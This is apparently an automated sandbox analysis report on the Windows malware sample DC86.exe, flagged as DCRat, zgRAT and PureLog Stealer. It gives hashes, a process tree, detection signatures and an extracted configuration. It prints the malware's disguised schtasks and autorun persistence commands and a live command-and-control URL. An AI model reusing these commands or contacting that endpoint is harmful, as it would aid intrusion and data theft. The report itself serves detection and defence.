Edit tour

Windows Analysis Report
DC86.exe

Overview

General Information

Sample name:	DC86.exe
Analysis ID:	1589194
MD5:	50ee114bba99ce3a7ba3e64c0080a644
SHA1:	3c9f1189b07b612888a1124714d1586408c78ba0
SHA256:	e7fb15dc103eca61803e214b533fb4dd3fa3d4b171886f452eb6ab8353ee2aa6
Tags:	DCRatexeNyashTeamuser-MalHunter1
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files to the user root directory

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DC86.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\DC86.exe" MD5: 50EE114BBA99CE3A7BA3E64C0080A644)

wscript.exe (PID: 5040 cmdline: "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3064 cmdline: C:\Windows\system32\cmd.exe /c ""C:\hyperIntoBroker\7ZVJJhRLWkC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

hyperProviderbrokermonitorNet.exe (PID: 1416 cmdline: "C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

schtasks.exe (PID: 5612 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7072 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 6772 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 5804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3377.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 6276 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6568 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES355B.tmp" "c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 4800 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4016 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5848 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2760 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4080 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1012 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1088 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 10 /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6720 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6700 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 14 /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4436 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 7 /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5536 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5280 cmdline: schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 9 /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2876 cmdline: schtasks.exe /create /tn "hyperProviderbrokermonitorNeth" /sc MINUTE /mo 5 /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2884 cmdline: schtasks.exe /create /tn "hyperProviderbrokermonitorNet" /sc ONLOGON /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1908 cmdline: schtasks.exe /create /tn "hyperProviderbrokermonitorNeth" /sc MINUTE /mo 14 /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6292 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1916 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6268 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WmiPrvSE.exe (PID: 4080 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

PuhmblZdAcSNmlRDfzjrgW.exe (PID: 3132 cmdline: "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 5324 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PuhmblZdAcSNmlRDfzjrgW.exe (PID: 6800 cmdline: "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

hyperProviderbrokermonitorNet.exe (PID: 6272 cmdline: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

hyperProviderbrokermonitorNet.exe (PID: 3512 cmdline: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

PuhmblZdAcSNmlRDfzjrgW.exe (PID: 3468 cmdline: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary", "MUTEX": "DCR_MUTEX-9i5llWSDsSpUTw8pYfrW", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
DC86.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
DC86.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2110245096.00000000074E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000000.2240119173.0000000000412000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2109455110.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: hyperProviderbrokermonitorNet.exe PID: 1416	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.3.DC86.exe.6c2a701.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.DC86.exe.6c2a701.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.DC86.exe.7535701.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.DC86.exe.7535701.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.hyperProviderbrokermonitorNet.exe.410000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.hyperProviderbrokermonitorNet.exe.410000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.DC86.exe.7535701.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.DC86.exe.7535701.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.DC86.exe.6c2a701.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.DC86.exe.6c2a701.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, ProcessId: 1416, TargetFilename: C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, ProcessId: 1416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, ProcessId: 1416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe", ParentImage: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, ParentProcessId: 1416, ParentProcessName: hyperProviderbrokermonitorNet.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline", ProcessId: 6772, ProcessName: csc.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DC86.exe", ParentImage: C:\Users\user\Desktop\DC86.exe, ParentProcessId: 6936, ParentProcessName: DC86.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe" , ProcessId: 5040, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, ProcessId: 1416, TargetFilename: C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe", ParentImage: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, ParentProcessId: 1416, ParentProcessName: hyperProviderbrokermonitorNet.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline", ProcessId: 6772, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T16:23:36.760225+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49885	172.67.220.198	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DC86.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\oOURfLEr.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\zSWmQQDs.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\iLGHwdYd.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\sBmPHITf.log	Avira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\LNOVbeou.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\XXbRMRdv.log	Avira: detection malicious, Label: TR/AD.BitpyRansom.lcksd

Found malware configuration

Source: 00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary", "MUTEX": "DCR_MUTEX-9i5llWSDsSpUTw8pYfrW", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\LNOVbeou.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\PdatkTco.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PuTbcYNO.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\XXbRMRdv.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\ZkzjoDJQ.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\iLGHwdYd.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\oOURfLEr.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\oncOKnjP.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\sBmPHITf.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\zSWmQQDs.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	ReversingLabs: Detection: 83%
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: DC86.exe	Virustotal: Detection: 55%			Perma Link
Source: DC86.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 87.6% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\oOURfLEr.log	Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\zSWmQQDs.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RGruEKtj.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\gBkGwLsc.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GQKmsfxg.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BfvFrBjN.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DC86.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

